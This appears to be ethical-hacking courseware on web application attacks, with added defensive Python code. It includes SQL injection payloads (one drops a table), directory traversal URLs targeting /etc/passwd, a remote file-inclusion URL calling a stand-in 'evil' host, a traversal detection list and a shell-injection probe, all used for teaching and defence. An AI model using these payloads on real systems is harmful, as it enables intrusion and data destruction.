Broken Session Management: When security-sensitive credentials such as passwords and other useful material are not properly taken care of, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.
Security Misconfiguration: Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, which attackers exploit to compromise web application security.
Broken Account Management: Even authentication schemes that are valid are weakened because of vulnerable account management functions including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.
Insecure Storage: Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
• 31. Web Application Threats - 2
Platform Exploits: Various web applications are built using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.
Insecure Direct Object References: When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place. For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.
Insecure Cryptographic Storage: When sensitive data is stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken to store the cryptographic keys securely. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.
• 32. Authentication Hijacking: In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.
Network Access Attacks: Network access attacks can majorly impact web applications. These can affect the basic level of services within an application and can allow access that standard HTTP application methods would not have.
Cookie Snooping: Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.
Web Services Attacks: Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.
Insufficient Transport Layer Protection: SSL/TLS should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and compromise of admin accounts may follow after systems are compromised.
Hidden Manipulation: These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.
DMZ Protocol Attacks: The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:
- Compromise of the web application and data
- Defacement of websites
- Access to internal systems, including databases, backups, and source code
• 33. Unvalidated Redirects and Forwards: Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass leading to:
- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution
Failure to Restrict URL Access: An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.
Obfuscation Application: Attackers usually work hard at hiding their attacks to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.
Security Management Exploits: Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
Session Fixation Attack: In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.
Malicious File Execution: Malicious file execution vulnerabilities have been found in most applications. This vulnerability is caused by unchecked input into the web server. Due to this unchecked input, the attackers' files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and in at least some cases, takes complete control over the systems.
• 34. Unvalidated Input
An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning.
An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods prevailing for the purpose of encoding. Many HTTP inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various vulnerable attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in the cookies and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.
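As an added example (not code from the course material) of the canonicalization step described here, applied to the directory traversal threat from Threats - 1 and the Unicode/UTF-8/URL-encoding obfuscation from Threats - 2: a Python path check that undoes nested percent-encoding and folds compatibility Unicode before deciding whether a requested path stays inside the web root. The sample requests and the three-round decode limit are constructed assumptions.

```python
import posixpath
import unicodedata
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: legitimate clients never double-encode


def canonicalize(value: str) -> str:
    """Reduce the encodings named on the slides (URL/percent encoding, nested
    encoding, Unicode compatibility forms) to one plain form before any check."""
    rounds = 0
    prev = None
    # Decode repeatedly: a single unquote() leaves "%252e" as "%2e", which a
    # downstream component may decode again after the filter has passed it.
    while prev != value:
        if rounds >= MAX_DECODE_ROUNDS:
            raise ValueError("too many encoding layers")
        prev, value = value, unquote(value)
        rounds += 1
    # NFKC maps full-width variants (e.g. U+FF0E, U+FF0F) to '.' and '/'.
    value = unicodedata.normalize("NFKC", value)
    # Many servers treat '\\' like '/'; normalize so one rule covers both.
    return value.replace("\\", "/")


def safe_relative_path(requested: str) -> str:
    """Return a normalized path relative to the web root, or raise ValueError
    if the request (after canonicalization) would escape the root."""
    clean = canonicalize(requested)
    if "\x00" in clean:
        raise ValueError("NUL byte in path")
    norm = posixpath.normpath(clean)
    if norm.startswith("/") or norm == ".." or norm.startswith("../"):
        raise ValueError("path escapes web root: %r" % norm)
    return norm


def is_rejected(requested: str) -> bool:
    """True when safe_relative_path() refuses the request (used by the checks)."""
    try:
        safe_relative_path(requested)
    except ValueError:
        return True
    return False


# Constructed sample requests: one legitimate, the rest traversal attempts in
# the encodings the Obfuscation Application slide lists.
SAMPLE_REQUESTS = [
    "images/./logo.png",                   # legitimate
    "../../etc/passwd",                    # plain traversal
    "..%2F..%2Fetc%2Fpasswd",              # URL-encoded separators
    "%252e%252e%2fetc%2fpasswd",           # double-encoded dots
    "\uff0e\uff0e\uff0fetc\uff0fpasswd",   # full-width Unicode dots/slash
    "..\\..\\windows\\win.ini",            # backslash separators
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict = "REJECT" if is_rejected(req) else safe_relative_path(req)
        print("%-40r -> %s" % (req, verdict))
```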
• 35. Figure 13.5: Unvalidated Input (figure: the browser posts the request http://juggyboy.com/login.aspx?user=jasons&pass=springfield; the browser input is not validated by the web application, which builds the modified query from it and sends it to the database)
The query-building code shown in the figure (deliberately vulnerable: the user-supplied values are concatenated straight into the SQL text):
string sql = "select * from Users where user = '" + User.Text + "' and pwd='" + Password.Text + "'";
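The figure's C# concatenation rebuilt in Python beside the parameterised form, as an added example that is not part of the course material: the same login against an in-memory SQLite table (constructed, holding only the jasons/springfield account from the figure) shows why the unvalidated version accepts a quote-bearing test input and the validated, parameterised version does not.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the Users table the figure's query reads.
    (Plain-text passwords are kept only to mirror the figure; hash them in
    real code.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT PRIMARY KEY, pwd TEXT NOT NULL)")
    conn.execute("INSERT INTO Users VALUES ('jasons', 'springfield')")
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Mirrors the figure's string concatenation: client input becomes SQL syntax."""
    sql = ("select * from Users where user = '" + user +
           "' and pwd='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None


# Server-side whitelist for the username field (assumption: usernames are
# short ASCII identifiers). Anything else is rejected before reaching SQL.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def login_safe(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Validate on the server, then bind values instead of splicing them in."""
    if not USERNAME_RE.match(user) or not 1 <= len(pwd) <= 128:
        return False
    # Parameterised query: the driver sends the values separately from the
    # statement text, so quote characters in the input cannot alter the WHERE.
    row = conn.execute(
        "select 1 from Users where user = ? and pwd = ?", (user, pwd)
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run both logins with valid credentials and with the classic tautology
    test input, returning the four outcomes."""
    conn = make_db()
    tautology = "' or '1'='1"  # constructed test input, not a credential
    return {
        "unsafe_valid": login_unsafe(conn, "jasons", "springfield"),
        "unsafe_tautology": login_unsafe(conn, "jasons", tautology),
        "safe_valid": login_safe(conn, "jasons", "springfield"),
        "safe_tautology": login_safe(conn, "jasons", tautology),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-18s login accepted: %s" % (name, outcome))
```

With the unvalidated query the tautology input turns the WHERE clause into `user = 'jasons' and pwd='' or '1'='1'`, which matches every row; the parameterised query compares the literal string and fails.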
  • 36. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications P a r a m e t e r / F o r m T a m p e r i n g ‫ו‬ C E H Urtifwd tlfcxjl lUthM J A w eb param eter tam pering attack involves the m anip u la tio n o f param eters exchanged between ______ . - - . client and server in o rder to m odify application data such as user credentials and perm issions, price, and q uantity o f products J A param eter tam pering attack e xplo its vu ln e ra b ilitie s in integrity and logic validation mechanisms th a t may result in XSS, SQL injection, etc. C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited . P a r a m e t e r / F o r m T a m p e r i n g r-• ■‫ייי‬‫ח‬ Param eter tam pering is a sim ple form o f attack aim ed directly at the application's business logic. This attack takes advantage o f the fact th a t m any program m ers rely on hidden or fixed fields (such as a hidden tag in a form or a param eter in an URL) as the only security measure fo r certain operations. To bypass this security m echanism , an attacker can change these param eters. D etailed D escription Serving the requested files is the m ain function o f w eb servers. During a w eb session, param eters are exchanged betw een the w eb brow ser and the w eb application in order to m aintain inform ation about the client's session, which elim inates the need to m aintain a com plex database on the server side. URL queries, form fields, and cookies are used to pass the param eters. Changed param eters in the form field are the best exam ple o f param eter tam p e rin g . W hen a user selects an HTML page, it is stored as a form field value, and transferred as an HTTP page to the web application. These values may be pre-selected (com bo box, check box, radio buttons, etc.), free text, or hidden. An attacker can m anipulate these values. 
In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.
[Figure: tampering with the URL parameters (profile and debit in cust.asp) and with other parameters, including attribute parameters (status in stat.asp); the URLs are reproduced in Figure 13.6 below.]
  • 37. Hidden fields that are invisible to the end user provide status information to the web application. For example, consider a product order form that includes the following hidden field:
    <input type="hidden" name="price" value="99.90">
Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:
    <FORM METHOD=POST ACTION="xferMoney.asp">
    Source Account: <SELECT NAME="SrcAcc">
    <OPTION VALUE="123456789">******789</OPTION>
    <OPTION VALUE="868686868">******868</OPTION></SELECT>
    <BR>Amount: <INPUT NAME="Amount" SIZE=20>
    <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
    <BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
    </FORM>
Bypassing: An attacker may bypass the need to choose between the two accounts by adding another account to the HTML page source code. The new combo box entry is displayed in the web browser and the attacker can choose the new account. HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount.
When the submit button is pressed in the web browser, the following URL is requested:
    http://www.juggybank.com/cust.asp?profile=21&debit=2500
An attacker may change the URL parameters (profile and debit) in order to debit another account:
    http://www.juggybank.com/cust.asp?profile=82&debit=1500
There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:
    http://www.juggybank.com/stat.asp?pg=531&status=view
  • 38. An attacker can modify the status parameter to "delete" in order to delete permission for the content:
    http://www.juggybank.com/stat.asp?pg=147&status=delete
Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.
[Figure 13.6: Form Tampering. Tampering with the URL parameters: http://www.juggybank.com/cust.asp?profile=21&debit=2500 becomes http://www.juggybank.com/cust.asp?profile=82&debit=1500. Other parameters can be changed, including attribute parameters: http://www.juggybank.com/stat.asp?pg=531&status=view becomes http://www.juggybank.com/stat.asp?pg=147&status=delete.]
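As an added example (not part of the courseware), the server-side checks that defeat the two tampered requests above: the ownership table, page author table, balances and session user are constructed for illustration, and the handlers stand in for cust.asp and stat.asp.

```python
# Constructed server-side data. A real application reads these from its own
# database; the point is that none of it comes from the request.
PROFILE_OWNER = {21: "jason", 82: "alice"}   # customer profile -> account owner
BALANCES = {21: 5000.00, 82: 9000.00}
PAGE_AUTHOR = {531: "jason", 147: "alice"}   # content page -> author


class Forbidden(Exception):
    """The request names an object the session user is not allowed to act on."""


def handle_cust(session_user, params):
    """Stand-in for /cust.asp?profile=<id>&debit=<amount>.

    profile and debit arrive in the URL and are therefore attacker
    controlled. The only trustworthy fact is which user the session
    belongs to, so the profile is checked against that before any debit.
    """
    profile = int(params["profile"])
    amount = float(params["debit"])
    # profile=82 sent from jason's session is rejected even though the
    # URL itself is perfectly well formed.
    if PROFILE_OWNER.get(profile) != session_user:
        raise Forbidden(f"{session_user} does not own profile {profile}")
    if amount <= 0 or amount > BALANCES[profile]:
        raise ValueError("debit amount out of range")
    BALANCES[profile] -= amount
    return BALANCES[profile]


def handle_stat(session_user, params):
    """Stand-in for /stat.asp?pg=<id>&status=view|delete.

    'view' is open to any authenticated user. 'delete' is an author-only
    action, so the author check lives here, on the server, rather than in
    the assumption that a normal client never sends status=delete.
    """
    page = int(params["pg"])
    status = params["status"]
    if status == "view":
        return f"viewing page {page}"
    if status == "delete":
        if PAGE_AUTHOR.get(page) != session_user:
            raise Forbidden(f"{session_user} is not the author of page {page}")
        return f"deleted page {page}"
    raise ValueError(f"unknown status {status!r}")


def try_request(handler, session_user, params):
    """Run a handler and report the outcome as a tuple instead of raising,
    the way a framework would map exceptions onto 403/400 responses."""
    try:
        return ("ok", handler(session_user, params))
    except Forbidden as exc:
        return ("forbidden", str(exc))
    except (ValueError, KeyError) as exc:
        return ("bad_request", str(exc))


if __name__ == "__main__":
    # Normal request from jason, then the two tampered requests from the slide.
    print(try_request(handle_cust, "jason", {"profile": "21", "debit": "2500"}))
    print(try_request(handle_cust, "jason", {"profile": "82", "debit": "1500"}))
    print(try_request(handle_stat, "jason", {"pg": "147", "status": "delete"}))
```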
  • 39. Directory Traversal. When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:
  - Enumerate the contents of files and directories
  - Access pages that otherwise require authentication (and possibly payment)
  - Gain secret knowledge of the application and its construction
  - Discover user IDs and passwords buried in hidden files
  - Locate source code and other interesting files left on the server
  - View sensitive data, such as customer information
  • 40. The following example uses ../ sequences to back up several directories and obtain a file containing a backup of the web application:
    http://www.targetsite.com/../../../sitebackup.zip
This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:
    http://www.targetsite.com/../../../../etc/passwd
Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:
    http://www.juggyboy.com/process.aspx=../some dir/some file
    http://www.juggyboy.com/../../../../some dir/some file
[Figure 13.7: Directory Traversal. The attacker sends /../../../etc/passwd to the vulnerable server code (a PHP script that includes a file named by a $theme variable), and the server returns the contents of the password file.]
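Added example, not from the courseware: the containment check a file-serving handler needs against the requests above, plus a detection pass over constructed access-log lines. The document root and log lines are invented for illustration.

```python
import os
from urllib.parse import unquote

# Constructed document root; nothing needs to exist on disk for the check,
# because the decision is made on the normalized absolute path.
DOC_ROOT = "/srv/www/public"


def resolve_request_path(doc_root, request_path):
    """Map a URL path onto a file under doc_root.

    Returns the path relative to the root, or None when the request escapes
    it. The URL is percent-decoded first so '..%2f' is judged after decoding,
    and containment is checked with commonpath on the normalized absolute
    path, so '/srv/www/public2' is not mistaken for a child of
    '/srv/www/public' the way a plain string-prefix test would.
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:          # NUL truncates strings in C runtimes
        return None
    root = os.path.realpath(doc_root)
    # lstrip('/') so the request is always joined *under* the root instead
    # of being treated as an absolute path that replaces it.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return os.path.relpath(candidate, root)


# Detection side: substrings that show up in traversal probes, raw or encoded.
TRAVERSAL_MARKERS = ("../", "..\\", "%2e%2e", "..%2f", "..%5c")


def flag_traversal_attempts(log_lines):
    """Return request paths from access-log lines that look like traversal
    probes. Both the raw and the decoded path are inspected so encoded
    variants are caught. This is a heuristic for alerting, not a substitute
    for the containment check above."""
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split(" ")       # e.g. ['GET', '/x', 'HTTP/1.1']
        path = request[1] if len(request) > 1 else request[0]
        probe = (path + " " + unquote(path)).lower()
        if any(marker in probe for marker in TRAVERSAL_MARKERS):
            hits.append(path)
    return hits


# Constructed access-log lines in combined log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /../../../../etc/passwd HTTP/1.1" 403 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /..%2f..%2fsitebackup.zip HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for path in ("/index.html", "/../../../../etc/passwd", "/..%2f..%2f..%2fsitebackup.zip"):
        print(path, "->", resolve_request_path(DOC_ROOT, path))
    print("flagged:", flag_traversal_attempts(SAMPLE_LOG))
```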
  • 41. Security Misconfiguration. Easy exploitation: using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc. Common prevalence: security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code. Example: the application server admin console is automatically installed and not removed; default accounts are not changed; the attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over.
Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders cannot make use of them for malicious attacks.
All application-based files have to be protected through proper authentication and strong security methods, or crucial information can be leaked to attackers. Examples of unnecessary features that should be disabled or changed include:
  - The application server admin console is automatically installed and not removed
  - Default accounts are not changed
  • 42.   - The attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over
  • 43. Injection Flaws. Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc., and can be easily discovered by application vulnerability scanners and fuzzers. SQL injection involves the injection of malicious SQL queries into user input forms; command injection involves the injection of malicious code through a web application; LDAP injection involves the injection of malicious LDAP statements.
Injection flaws are the loopholes in the web application that allow unreliable data to be interpreted and executed as part of a command or query. Injection flaws are exploited by the attacker by constructing malicious commands or queries that result in loss of data or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can easily read, write, delete, and update any data, whether relevant or irrelevant to that particular application. There are many types of injection flaws; some of them are as follows:
SQL injection: SQL injection is the most common website vulnerability on the Internet.
It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. The attacker injects malicious SQL queries into the user input form, usually either to gain unauthorized access to a database or to retrieve information directly from the database.
Command injection: Command injection flaws are another type of web application vulnerability.
  • 44. These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.
LDAP injection: LDAP injection is an attack method in which a website that constructs LDAP statements from user-supplied input is exploited for launching attacks. When an application fails to sanitize the user input, the LDAP statement can be modified with the help of a local proxy. This in turn results in the execution of arbitrary commands, such as granting access to unauthorized queries and altering the content inside the LDAP tree.
  • 45. SQL Injection Attacks. SQL injection attacks use a series of malicious SQL queries to directly manipulate the database. An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches.
SQL injection vulnerable server code:
    <?php
    function saveemail($user, $message)
    {
        $sql = "INSERT INTO Messages (
            user, message
        ) VALUES (
            '$user', '$message'
        )";
        return mysql_query($sql);
    }
    ?>
The attacker sends test');DROP TABLE Messages;-- from the web browser; when this code is sent to the database server, it drops the Messages table. Code to insert spammy data on behalf of other users: test'),('user2','I am Jason'),('user3','You are hacked
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection.
SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.
The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement:
    select * from tablename where UserID = 2302
becomes the following with a simple SQL injection attack:
    SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:
  - Log in to the application without supplying valid credentials
  • 46.   - Perform queries against data in the database, often even data to which the application would not normally have access
  - Modify the database contents, or drop the database altogether
  - Use the trust relationships established between the web application components to access other databases
[Figure 13.8: SQL Injection Attacks. The vulnerable server code (the saveemail() PHP function above) receives test');DROP TABLE Messages;-- from the web browser, which drops the Messages table, or test'),('user2','I am Jason'),('user3','You are hacked, which inserts spammy data on behalf of other users.]
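Added example, not the courseware's PHP: the Messages INSERT and the UserID lookup from the last two slides, each built by string interpolation and then with bound parameters, run against an in-memory SQLite database. The payloads are constructed two-column variants of the slide's so that they parse against this INSERT; the Users rows are invented.

```python
import sqlite3


def fresh_db():
    """Constructed schema: the slide's Messages table plus a small Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Messages (user TEXT, message TEXT)")
    conn.execute("CREATE TABLE Users (UserID INTEGER, name TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [(2302, "jason"), (2303, "alice"), (2304, "bob")])
    conn.commit()
    return conn


def save_email_vulnerable(conn, user, message):
    """String interpolation, as in the slide's saveemail(). executescript runs
    every statement in the string, which is what lets a stacked DROP TABLE
    execute; that mirrors the behaviour the slide describes."""
    sql = f"INSERT INTO Messages (user, message) VALUES ('{user}', '{message}')"
    conn.executescript(sql)


def save_email_safe(conn, user, message):
    """Parameterized statement: the driver sends values separately from the
    SQL text, so quotes and semicolons in the input are stored, not parsed."""
    conn.execute("INSERT INTO Messages (user, message) VALUES (?, ?)", (user, message))
    conn.commit()


def lookup_user_vulnerable(conn, user_id):
    """WHERE clause built from the raw string, giving 'UserID = 2302 OR 1=1'."""
    sql = f"SELECT name FROM Users WHERE UserID = {user_id} ORDER BY UserID"
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, user_id):
    """Coerce to the expected type first, then bind it. Non-numeric input is
    rejected (None, for the caller to turn into a 400) before any SQL exists."""
    try:
        uid = int(user_id)
    except ValueError:
        return None
    return conn.execute(
        "SELECT name FROM Users WHERE UserID = ? ORDER BY UserID", (uid,)).fetchall()


def messages_table_exists(conn):
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name='Messages'").fetchone()
    return row is not None


def stored_messages(conn):
    return conn.execute("SELECT user, message FROM Messages ORDER BY rowid").fetchall()


# Constructed payloads: the slide's two attacks, adjusted to close the
# two-column VALUES tuple so the injected SQL is syntactically complete.
DROP_PAYLOAD = "test', 'x'); DROP TABLE Messages;--"
SPAM_PAYLOAD = "test', 'x'), ('user2', 'I am Jason'), ('user3"


def demo_drop(safe):
    """Submit the DROP payload as the user field; report whether the table survived."""
    conn = fresh_db()
    (save_email_safe if safe else save_email_vulnerable)(conn, DROP_PAYLOAD, "hello")
    return messages_table_exists(conn)


def demo_spam(safe):
    """Submit the spam payload as the user field; report what ended up stored."""
    conn = fresh_db()
    (save_email_safe if safe else save_email_vulnerable)(conn, SPAM_PAYLOAD, "You are hacked")
    return stored_messages(conn)


if __name__ == "__main__":
    print("table survives, interpolated:", demo_drop(safe=False))
    print("table survives, parameterized:", demo_drop(safe=True))
    print("rows, interpolated:", demo_spam(safe=False))
    print("rows, parameterized:", demo_spam(safe=True))
    db = fresh_db()
    print("lookup, interpolated:", lookup_user_vulnerable(db, "2302 OR 1=1"))
    print("lookup, parameterized:", lookup_user_safe(db, "2302 OR 1=1"))
```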
  • 47. Command Injection Attacks. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs. HTML embedding: this type of attack is used to deface websites virtually; using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting. File injection: the attacker exploits this vulnerability and injects malicious code into system files, for example http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system over system calls, use of external programs over shell commands, and calls to backend databases over SQL. Scripts written in Perl, Python, and other languages are executed and inserted into poorly designed web applications. If a web application uses any type of interpreter, attacks are inserted to inflict damage. To perform functions, web applications must use operating system features and external programs. Although many programs are invoked externally, the most frequently used program is Sendmail.
When a piece of information is passed through an HTTP external request, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting SQL is dangerous and rather widespread, as it is a form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.
Shell Injection: To complete various functionalities, web applications use various applications and programs. It is just like sending an email by using the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous
  • 48. especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
HTML Embedding: This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.
File Injection: The attacker exploits this vulnerability and injects malicious code into system files:
    http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit
Users are allowed to upload various files to the server through various applications, and those files can be accessed through the Internet from any part of the world. If the uploaded file ends with a php extension and any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands.
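Added example, not the courseware's: the shell injection described above shown as the same external-program call made through a shell and without one, together with the input check a mail-sending handler should apply before an address reaches sendmail. echo stands in for the external program so the block runs on any system with /bin/sh; the address pattern and sendmail path are assumptions.

```python
import re
import subprocess

# Allow-list for a plain e-mail address. Shell metacharacters such as
# ; | & ` $ ( ) and whitespace are simply not in the permitted set.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_address(value):
    """True only when the whole value matches the address pattern."""
    return ADDRESS_RE.fullmatch(value) is not None


def run_with_shell(user_input):
    """Vulnerable pattern: the input is spliced into a command line that is
    handed to /bin/sh, so ';', '|', '&&' and backticks are interpreted as
    command separators rather than as data."""
    result = subprocess.run(f"echo {user_input}", shell=True,
                            capture_output=True, text=True)
    return result.stdout.splitlines()


def run_without_shell(user_input):
    """Safe pattern: argv list, no shell. The input reaches the program as
    exactly one argument, whatever characters it contains."""
    result = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return result.stdout.splitlines()


def sendmail_argv(recipient):
    """How a handler should combine the two: validate first, then build an
    argv list (assumed sendmail path, not executed here). None means the
    request is rejected before any process is started."""
    if not validate_address(recipient):
        return None
    return ["/usr/sbin/sendmail", recipient]


if __name__ == "__main__":
    probe = "x; echo INJECTED"          # constructed input with a command separator
    print("through a shell:", run_with_shell(probe))
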